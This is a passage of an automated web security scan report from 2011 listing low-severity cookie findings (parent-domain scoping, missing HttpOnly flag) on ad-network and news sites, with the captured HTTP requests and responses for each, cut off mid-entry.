Cookie: uid=8218888f-9a83-4760-bd14-33b4666730c0; exchange_uid=eyIyIjogWyIyNzI0Mzg2MDE5MjI3ODQ2MjE4IiwgNzM0MjQ1XSwgIjQiOiBbIkNBRVNFQ0NyZjVYQkMyTExTQ3BjRWRBVjNzVSIsIDczNDI0NF19; partnerUID="eyIzOCI6ICJ1JTNENzUyNzY5MjA0NyUzQXMxJTNEMTMwMzEyMjI5NTgxNSUzQXRzJTNEMTMwNDI4MDI3NzY0NiUzQXMyLjMzJTNEJTJDMjc0MCUyQyIsICIxOTkiOiBbIkJERkJGRkMyMzFBMjgyRDZFMjQ0NUI4RTRERTRBMkUwIiwgdHJ1ZV0sICI0OCI6IFsiNjIxMDk0NzA0Nzc4NjMwMDI2ODI4MzM4NDI2NDg1NDcxMjI4NzAiLCB0cnVlXSwgIjE5NSI6IFsiMGNiYzVmNWMtZTNlYi1lMTJkLTJjMDYtZWQ3YzQwYjE5ZTkwIiwgdHJ1ZV0sICIxOTEiOiBbIjM3MDY2OTIzNDc1MTUzNTYzNTkiLCB0cnVlXSwgIjc5IjogWyIxNzU0YmI2NTA2MjNjNWJlNDNmY2EwYjU3YzM5MTBkOSIsIHRydWVdLCAiODQiOiBbIlE0emd2bldzOTk5clRTaEIiLCB0cnVlXX0="; segments_p1="eJzjYuZojOBi4Wj6zwQkm4EkEwcHkNXZwczFzDFRBcic9JQJyJxuDGTO/AFSNQdMzv0BEl4QDGSu3c8IZG4sBjJ37GLk4uLYuY9Z4NDBZe9YgOw9QPb3FduBbBaOve9BCvf7AZkHuxmB5KEjIEOO5gCZx5+ATD0BJk+CzT6dAyTOgeQufAeJXtwLIp9cAGl8sZsZSL7cBxJ5C2a/OwBy8T8OoJV/tjEJ7H7+DGglUCAcAECUP/o="; subID="{}"; impressions="{\"591275\": [1304301926+ \"Tb4RXwAHNm8K5ovHrlhLbw==\"+ 62899+ 25126+ 2261]+ \"578963\": [1303562003+ \"28aaa692-ea2e-30b9-be12-340089999af0\"+ 3241+ 40652+ 138]+ \"591270\": [1304243633+ \"Tb0trgAIvYcK5XcWpVIMAw==\"+ 62896+ 25126+ 11582]+ \"496804\": [1304949631+ \"38b398f7-1050-309a-8cf3-f8e907efb2ee\"+ 22032+ 89819+ 8978]+ \"610342\": [1304340532+ \"e4261c72-f3c7-37cd-b374-fe89df8a4a7b\"+ 12203+ 58117+ 4038]+ \"593710\": [1304340527+ \"3fd8060e-86f9-3d78-848d-3cf86700b5f3\"+ 8863+ 40494+ 4038]+ \"405594\": [1303072666+ \"2eefac09-883b-3f77-a8a9-19e6aac05dc5\"+ 22487+ 106641+ 227]+ \"448473\": [1304949607+ \"5a084518-c653-31f6-9001-dfed53bc2d1c\"+ 22489+ 70760+ 139]+ \"619680\": [1304542089+ \"3899594795659691748\"+ 4456+ 6017+ 11823]+ \"610341\": [1304340492+ \"7a7364c6-4495-3fd9-9cd1-35e19873ff86\"+ 12208+ 58117+ 4038]}"; camp_freq_p1="eJzjkuH4/o1ZgFHi/7P571gUGDX+H1/4jsWA0QLM55LhmH0DJPscKts+fwFYFsznEuFYeZYVKNv5vQ0oy6DBYMBgwQAUvXeAVYBJYsuFX2+RRa98ZgGqXY8m+gooyiTxbNEPFNEV80HmTu47jSK68z7ILbPmr0WIAgA1izvV"; 
io_freq_p1="eJzjEudY4CLAJPH/2fx3LAoMGgwGTBbPQWwuYY6rEQKMEp3f26ASDBYMQMH1rkDVWy78eosseDxQgFliPZrgtlCg9sl9p1EE97oABWfNX4sQBACAmCKB"; dp_rec="{\"1\": 1304340350+ \"3\": 1304949631+ \"2\": 1304949608+ \"5\": 1304340362+ \"4\": 1304340367}"

Response

HTTP/1.1 302 Found
Date: Mon, 09 May 2011 14:05:46 GMT
Set-Cookie: segments_p1="eJzjYuZYEMzFzHE0h4uF48QTJi4ujj37mAW+r9j+jgUocrCbEUhOesoEVNIYAZT8s41JYPfzZ0BJZo5zOUDiNEjjcaBGFo4duxiBAv/Cgcy970HM6cZA5pwfILl3B5iBZGcHiJz7A2TcRBUg88VuZqChO4E27rp3BGgoEwcHUGpjMVDqyQWQ1SfBut/uBum78B3EPnQERM4Eizf/B5n0jwPIbAIz9/sBmRf3guRe7gORa/czAgAW/EAt";Version=1;Path=/;Domain=invitemedia.com;Expires=Tue, 08-May-2012 14:05:46 GMT;Max-Age=31536000
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Cache-Control: no-cache
Location: http://ad.yieldmanager.com/pixel?id=1268638&t=2
Content-Length: 0
Connection: close
Server: Jetty(7.3.1.v20110307)


9.93. http://www.burstnet.com/enlightn/7578//12A4/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.burstnet.com
Path:   /enlightn/7578//12A4/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enlightn/7578//12A4/ HTTP/1.1
Host: www.burstnet.com
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 56Q8=3qCOBQmN0yUv6WrF--lZoc3dRfuweNq9qe4Bp0O5v0HfEOi0vh6R2kg; /BC3=.P_d.; /SO=:201:; /PC=0; /SC=0-2vc.1

Response

HTTP/1.1 200 OK
Server: Apache (Unix)
P3P: policyref="http://www.burstnet.com/w3c/p3p.xml", CP="NOI DSP LAW PSAa PSDa OUR IND UNI COM NAV STA"
Pragma: no-cache
Cache-Control: no-cache
Content-Type: image/gif
Date: Mon, 09 May 2011 14:01:03 GMT
Content-Length: 43
Connection: close
Set-Cookie: TID=16sfssv0tfhb31; path=/; expires=Sun, 07-Aug-2011 14:01:03 GMT; domain=.burstnet.com
Set-Cookie: CMS=/; path=/; domain=.burstnet.com
Set-Cookie: CMP=16g.1Elg; path=/; expires=Wed, 09-May-2012 14:01:03 GMT; domain=.burstnet.com

GIF89a.............!.......,...........D..;

10. Cookie without HttpOnly flag set
There are 135 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



10.1. http://admatch-syndication.mochila.com/viewer/channel/badgeCSS

Summary

Severity:   Low
Confidence:   Firm
Host:   http://admatch-syndication.mochila.com
Path:   /viewer/channel/badgeCSS

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /viewer/channel/badgeCSS?tid=10630&buyerId=OrlandoSentinel&channelId=13429&voxBust=6 HTTP/1.1
Host: admatch-syndication.mochila.com
Proxy-Connection: keep-alive
Referer: http://admatch-syndication.mochila.com/viewer/channel/badgex?&asHtml=true&buyerId=OrlandoSentinel&destination=1596&channelId=13429&tid=10630&destination=&articleTemplateId=&badgeTemplateId=&widgetClass=&assetExcludeId=null&randomize=false&buid=1&rd=www.orlandosentinel.com&mcmp=all_ibd_tout_widget
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=368EB20CFF65A4C969A63CDAAF21D7B4

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 13:59:38 GMT
Server: VoxCAST
Set-Cookie: JSESSIONID=DEAD8A70AF3A5710CCDB866C3344188D; Path=/
Last-Modified: Mon, 09 May 2011 10:22:17 GMT
Cache-Control: max-age=18000
Content-Language: en-US
P3P: CP="CUR ADM OUR NOR STA NID"
Vary: Accept-Encoding
Age: 13041
X-Cache: HIT from VoxCAST
Content-Type: text/css;charset=UTF-8
Content-Length: 5866


           #mochila-wrapper { /* position:relative; For IE6 hasLayout */ /* float:left; IE7 breaks without this! */ width:750px; margin:0 auto; font:normal 12px Arial, sans-serif; color:#2222
...[SNIP]...

10.2. http://admatch-syndication.mochila.com/viewer/channel/badgex

Summary

Severity:   Low
Confidence:   Firm
Host:   http://admatch-syndication.mochila.com
Path:   /viewer/channel/badgex

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /viewer/channel/badgex?&asHtml=true&buyerId=OrlandoSentinel&destination=1596&channelId=13429&tid=10630&destination=&articleTemplateId=&badgeTemplateId=&widgetClass=&assetExcludeId=null&randomize=false&buid=1&rd=www.orlandosentinel.com&mcmp=all_ibd_tout_widget HTTP/1.1
Host: admatch-syndication.mochila.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 13:59:37 GMT
Server: VoxCAST
Set-Cookie: JSESSIONID=368EB20CFF65A4C969A63CDAAF21D7B4; Path=/
Last-Modified: Mon, 09 May 2011 13:43:01 GMT
Cache-Control: max-age=12000
Content-Language: en-US
P3P: CP="CUR ADM OUR NOR STA NID"
Vary: Accept-Encoding
Age: 997
X-Cache: HIT from VoxCAST
Content-Type: text/html;charset=UTF-8
Content-Length: 9024


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<style type="text/css" media="screen">
body{

...[SNIP]...

10.3. http://ads.adxpose.com/ads/ads.js

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ads.adxpose.com
Path:   /ads/ads.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ads/ads.js?uid=9ByavNwWFmRBp6h6_40792835 HTTP/1.1
Host: ads.adxpose.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N2724.Centro.com/B5245176.26;sz=728x90;ord=[timestamp]?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=8046e9fe-2ba6-4040-b3b9-5d1af9c46888

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=D132C27E1D743D7D5282F1F2C64D6A22; Path=/
ETag: "0-gzip"
Cache-Control: must-revalidate, max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 09 May 2011 13:59:10 GMT
Connection: close

if(typeof __ADXPOSE_CONTAINERS__==="undefined"){__ADXPOSE_CONTAINERS__={}}if(typeof __ADXPOSE_EVENT_QUEUES__==="undefined"){__ADXPOSE_EVENT_QUEUES__={}}if(typeof __adxpose__getOffset__==="undefined"){
...[SNIP]...

10.4. http://event.adxpose.com/event.flow

Summary

Severity:   Low
Confidence:   Firm
Host:   http://event.adxpose.com
Path:   /event.flow

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /event.flow?eventcode=000_000_12&location=http%3A%2F%2Fwww.indianasnewscenter.com%2Fnews%2Flocal%2FAt-Noon-Casey-Anthony-Trial-Begins-In-Florida-Plus-More-121488004.html&uid=9ByavNwWFmRBp6h6_40792835&xy=0%2C0&wh=728%2C90&vchannel=382765&cid=Toyota_2011_RAAP&iad=1304949550599-23798237647861244&cookieenabled=1&screenwh=1920%2C1200&adwh=728%2C90&colordepth=16&flash=10.2&iframed=1 HTTP/1.1
Host: event.adxpose.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N2724.Centro.com/B5245176.26;sz=728x90;ord=[timestamp]?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=8046e9fe-2ba6-4040-b3b9-5d1af9c46888

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=E6395C0819D24DF51059D75784832A19; Path=/
Cache-Control: no-store
Content-Type: text/javascript;charset=UTF-8
Content-Length: 106
Date: Mon, 09 May 2011 13:59:11 GMT
Connection: close

if (typeof __ADXPOSE_EVENT_QUEUES__ !== "undefined") __ADXPOSE_DRAIN_QUEUE__("9ByavNwWFmRBp6h6_40792835");

10.5. http://s.clickability.com/s

Summary

Severity:   Low
Confidence:   Firm
Host:   http://s.clickability.com
Path:   /s

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /s?&5=300&35=1&6=121488004&7=654194&8=http%3A%2F%2Fwww.indianasnewscenter.com%2Fnews%2Flocal%2FAt-Noon-Casey-Anthony-Trial-Begins-In-Florida-Plus-More-121488004.html&9=&10=At%20Noon%3A%20Casey%20Anthony%20Trial%20Begins%20In%20Florida%2C%20Plus%20More%20%7C%20Indiana's%20NewsCenter%3A%20News%2C%20Sports%2C%20Weather%2C%20Fort%20Wayne%20WPTA-TV%2C%20WISE-TV%2C%20CW%2C%20and%20My%20Network%20%7C%20Local&11=Mozilla%2F5.0%20(Windows%20NT%206.1%3B%20WOW64)%20AppleWebKit%2F534.24%20(KHTML%2C%20like%20Gecko)%20Chrome%2F11.0.696.65%20Safari%2F534.24&12=en-US&13=1&14=1.7&15=1&16=1920x1200&17=16&18=0.881893583573401&19=910 HTTP/1.1
Host: s.clickability.com
Proxy-Connection: keep-alive
Referer: http://www.indianasnewscenter.com/news/local/At-Noon-Casey-Anthony-Trial-Begins-In-Florida-Plus-More-121488004.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vid=XSJJRwvp9uaycevK8bvSuzwT7PRE9+yX3HsherrzsbM=; ld=ssLQg212k+H3LqCSE0WF9IN1yHvGRQbEMl0oM8dwNE28YQc4QkM99dx7IXq687Gz

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 13:59:16 GMT
Server: Apache
Set-Cookie: ld=ssLQg212k+H3LqCSE0WF9IN1yHvGRQbEMl0oM8dwNE28YQc4QkM99XL38TFyZ8vyXR/UGUrAmz8RGD8FvPWnsA==; Domain=s.clickability.com; Expires=Sat, 27-May-2079 17:13:23 GMT; Path=/
Set-Cookie: JSESSIONID=982F79AAACC14088C889EF85F0EE5B75.stats0x; Path=/
P3P: policyref="http://www.clickability.com/w3c/p3p.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Content-Length: 42
X-Server-Name: dv-c1-r2-u7-b11
Connection: close
Content-Type: image/gif
Set-Cookie: Stats_Session=826803210.20480.0000; path=/

GIF89a.............!.......,........@..D.;

10.6. http://t.mookie1.com/t/v1/imp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://t.mookie1.com
Path:   /t/v1/imp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /t/v1/imp?migAgencyId=234&migSource=atlas&migAtlAI=205850969&migRandom=143243442&migTagDesc=Cingular&migAtlSA=286738722&migAtlC=480d7815-42e6-4315-a737-64cdf14f8adc HTTP/1.1
Host: t.mookie1.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/COM/iview/286738722/direct;wi.468;hi.60/01?click=http%3A%2F%2Fad%2Eyieldmanager%2Ecom%2Fclk%3F2%2C13%253B411066b5f02ce7a6%253B12fd50ec8f3%2C0%253B%253B%253B2504330642%2C7DlEAJUeFQAKf3sAAAAAACSrHgAAAAAAAgAAAAQAAAAAAP8AAAACCtSXIQAAAAAAO1ciAAAAAABSbigAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACvfA0AAAAAAAIAAwAAAAAA88gO1S8BAAAAAAAAAGE0ODFmZWJjLTdhNDQtMTFlMC05MDA0LTczNGVhOWE2MDJiMQCvugEAAAA%3D%2C%2Chttp%253A%252F%252Fwww%2Esurphace%2Ecom%252Fads%252Frubicon%5Forlandosentinel%2C$http%3A%2F%2Ft.invitemedia.com%2Ftrack_click%3FauctionID%3D13049496061384085-86537%26campID%3D60443%26crID%3D86537%26pubICode%3D2250555%26pub%3D321582%26partnerID%3D64%26url%3Dhttp%3A%2F%2Fwww%2Esurphace%2Ecom%2Fads%2Frubicon%5Forlandosentinel%26redirectURL%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; RMFL=011QD4ETU107OI|U107OK; RMFM=011QGuZMJ10CWN|U10CXL; NXCLICK2=011QGuZMNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_TE_ALL/1x1/11304348270.6228!y!B3!CXL!EVT; id=914804995789526

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:00:16 GMT
Server: Apache/2.0.52 (Red Hat)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="NOI DSP COR NID CUR OUR NOR"
Set-Cookie: id=914804995789526; path=/; expires=Sat, 02-Jun-12 14:00:16 GMT; domain=.mookie1.com
Set-Cookie: session=1304949616|1304949616; path=/; domain=.mookie1.com
Content-Length: 35
Content-Type: image/gif

GIF87a.............,...........D..;

10.7. http://www.clashmusic.com/news/sufjan-stevens-suffered-nervous-breakdown

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.clashmusic.com
Path:   /news/sufjan-stevens-suffered-nervous-breakdown

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /news/sufjan-stevens-suffered-nervous-breakdown HTTP/1.1
Host: www.clashmusic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:00:30 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: SESS5079a7bd09304b581fb1d164353615c5=47u27u5frb149p678dd9853b46; expires=Wed, 01-Jun-2011 17:33:50 GMT; path=/; domain=.clashmusic.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 09 May 2011 14:00:30 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 43192

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transititional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...

10.8. http://www.nme.com/news/sufjan-stevens/56527

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.nme.com
Path:   /news/sufjan-stevens/56527

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/sufjan-stevens/56527 HTTP/1.1
Host: www.nme.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
NmeAkamaiMatch: 1
IgniteAkamaiMatch: 1
X-Wf-Protocol-1: http://meta.wildfirehq.org/Protocol/JsonStream/0.2
X-Wf-1-Plugin-1: http://meta.firephp.org/Wildfire/Plugin/FirePHP/Library-FirePHPCore/0.3
X-Wf-1-Structure-1: http://meta.firephp.org/Wildfire/Structure/FirePHP/FirebugConsole/0.1
X-Wf-1-1-1-1: 55|[{"Type":"LOG"},"now: Mon, 09 May 2011 15:00:36 +0100"]|
X-Wf-1-1-1-2: 63|[{"Type":"LOG"},"id: 56830e3f97674f92659a8a7e54b9b44fea17850e"]|
X-Wf-1-1-1-3: 23|[{"Type":"LOG"},"li: "]|
X-Wf-1-1-1-4: 24|[{"Type":"LOG"},"cs: 1"]|
X-Wf-1-1-1-5: 23|[{"Type":"LOG"},"rc: "]|
X-Wf-1-1-1-6: 24|[{"Type":"LOG"},"ic: 1"]|
X-Wf-1-1-1-7: 28|[{"Type":"LOG"},"ttl: 3560"]|
X-Wf-1-1-1-8: 29|[{"Type":"LOG"},"mu: 786432"]|
X-Wf-1-1-1-9: 41|[{"Type":"LOG"},"ts: 0.0014510154724121"]|
X-Wf-1-1-1-10: 25|[{"Type":"LOG"},"ct: us"]|
Content-Type: text/html
Vary: Accept-Encoding
Expires: Mon, 09 May 2011 14:00:37 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Mon, 09 May 2011 14:00:37 GMT
Connection: close
Set-Cookie: ServerID=1043; path=/
Set-Cookie: PHPSESSID=nb14qm2u5j3cpt8fp8muap0hh1; path=/; domain=.nme.com
Set-Cookie: ignite_loggedin=false; expires=Wed, 08-Jun-2011 14:00:36 GMT; path=/; domain=.nme.com
Set-Cookie: browsertype=web; expires=Tue, 10-May-2011 14:00:37 GMT; path=/; domain=.nme.com
Content-Length: 62535

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/
...[SNIP]...

10.9. http://ad.afy11.net/ad

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.afy11.net
Path:   /ad

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad?mode=7&publisher_dsp_id=2&external_user_id=2931142961646634775 HTTP/1.1
Host: ad.afy11.net
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&rnd=8532944041141139446&fpid=12&nu=n&t=&sp=n&purl=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: a=dlTCn+fJdUa0LKLUTmKT9w; f=AgECAAAAAADQJJIL142rTdU9kgdm-bJN; c=AQEDAAAAAADd1IcE942rTQAAAAAAAAAAAAAAAAAAAADXjatNAQABAAVhFtXoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD-OLnU6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHTSCgFcjqtNAAAAAAAAAAAAAAAAAAAAADuOq00BAAEABWEW1egAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP84udToAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAoOsmAWj9sk0AAAAAAAAAAAAAAAAAAAAAZv2yTQEAAQD5JiDV6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAyyS71OgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=; s=1,2*4dab79ba*48Tp2my9Nk*5pS60fYTxp8svLzyNVfDVhLzEw==*,5*4db5834c*2EEOB9ANdq*SF70FY7-Mq4FQiM_*

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: no-cache, must-revalidate
Server: AdifyServer
Content-Type: image/gif
Content-Length: 45
Set-Cookie: s=1,2*4dab79ba*UMOtU6T9f3*5oBTqxB3t3jlHiD_vqydkrPvYQ==*,5*4db5834c*2EEOB9ANdq*SF70FY7-Mq4FQiM_*; path=/; expires=Sat, 31-Dec-2019 00:00:00 GMT; domain=afy11.net;
P3P: policyref="http://ad.afy11.net/privacy.xml", CP=" NOI DSP NID ADMa DEVa PSAa PSDa OUR OTRa IND COM NAV STA OTC"

GIF89a.............!.......,...........D..;if

10.10. http://ad.turn.com/server/pixel.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/pixel.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /server/pixel.htm?fpid=12 HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2931142961646634775; Domain=.turn.com; Expires=Sat, 05-Nov-2011 14:00:03 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 09 May 2011 14:00:02 GMT
Content-Length: 336

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&rnd=2819581112640559492&fpid=12&nu=n&t
...[SNIP]...

10.11. http://ad.yieldmanager.com/iframe3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

